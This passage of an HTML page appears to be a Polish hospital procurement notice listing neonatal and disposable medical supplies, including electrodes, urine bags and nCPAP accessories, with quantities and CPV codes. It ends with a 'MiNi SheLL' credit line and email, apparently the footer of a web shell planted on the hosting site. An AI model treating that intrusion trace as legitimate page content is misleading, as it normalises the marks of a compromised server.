10.	Zaciskacz do pępowiny	xxxxxxxxxxx	szt.	1200
11.	Wieszak do worków na mocz 	xxxxxxxxxxx	szt.	300
12.	Sterylny woreczek na mocz dla chłopców, 	100 -120 ml	szt.	700
13.	Sterylny woreczek na mocz dla  dziewczynek, 	100 -120 ml	szt.	800
14.	Łącznik do kontroli odsysania - Fingertip 	x	szt.	1000
15.	Przyrząd do pobierania (upustu) krwi z pojemnikiem 	x	szt.	15
16.	Zestaw do wlewów kontrastowych kolografii bez barytu	x	szt.	50
17.	Zestaw do wlewów kontrastowych kolografii z barytem	x	szt.	4
18.	Elektrody do EKG	x	szt.	26100
19	Elektrody do badań HOLTERA 	x	szt.	10800
20.	Elektrody do EKG pediatryczne -	22-33 mm   22-22 mm	szt.	50
21.	Elektrody do EKG -  dla noworodka.	x	szt.	50
22.	Jednorazowe mankiety noworodkowe 	   rozmiar 2 - obwód ramienia 4,3 do 8,0 cm romiar 3 - obwód ramienia 5,8 do 10,9 cm.	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr  5 (23) - Akcesoria do fototerapii, dezynfekcji parowej oraz do podowania pokarmu niemowlętom.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Kombinezon  do fototerapii 	x	szt.	5
2.	Kombinezon  do fototerapii 	x	szt.	1
3.	Torebka do przeprowadzenia dezynfekcji parowej  w kuchence mikrofalowej, 	x	szt.	40
4.	Kubeczek do podawania pokarmu niemowlęciu 	x	szt.	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6 (31) - Akcesoria pomocnicze do nCPAP Infant Flow.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Jednorazowy układ oddechowy	x	szt	10
2.	Jednorazowy układ oddechowy (Generator posiadający 4 dysze)	x	szt	8
3.	Maseczka nosowa jednorazowa	x	szt	4
4.	Maseczka nosowa,	x	szt	5
5.	Czapeczka 	x	szt	5
6.	Czapeczka 	x	szt	5
7.	Mocowanie paskowe generatora 	x	szt	10
8.	Mocowanie do czujnika temperatury dla noworodków, 	x	szt	50
9.	Filtr powietrza do inkubatora	11cm x 11cm	szt	3
10.	Filtr powietrza  F-4E 	51cm x 17cm	szt	3
11.	Filtr powietrza F-6E	23,5cm x 15,5cm	szt	3
12.	Filtr bakteryjny 	x	szt	20
13.	Materacyk do inkubatora	x	szt	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet nr 7 - Różny sprzęt jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Przedmiot zamówienia	Rozmiar	Jednostka miary	Ilość jednostek miary zamawiana (wg. wielkości opakowania oczekiwanego przez Zamawiającego)
1.	2.	3.	4.	5.
1.	Pinceta medyczna  jednorazowego użytku	140 mm	szt.	600
2.	Osłonki medyczne		szt.	8928
3.	Gumki do ligacji żylaków odbytu		op.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 11.06.2016.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com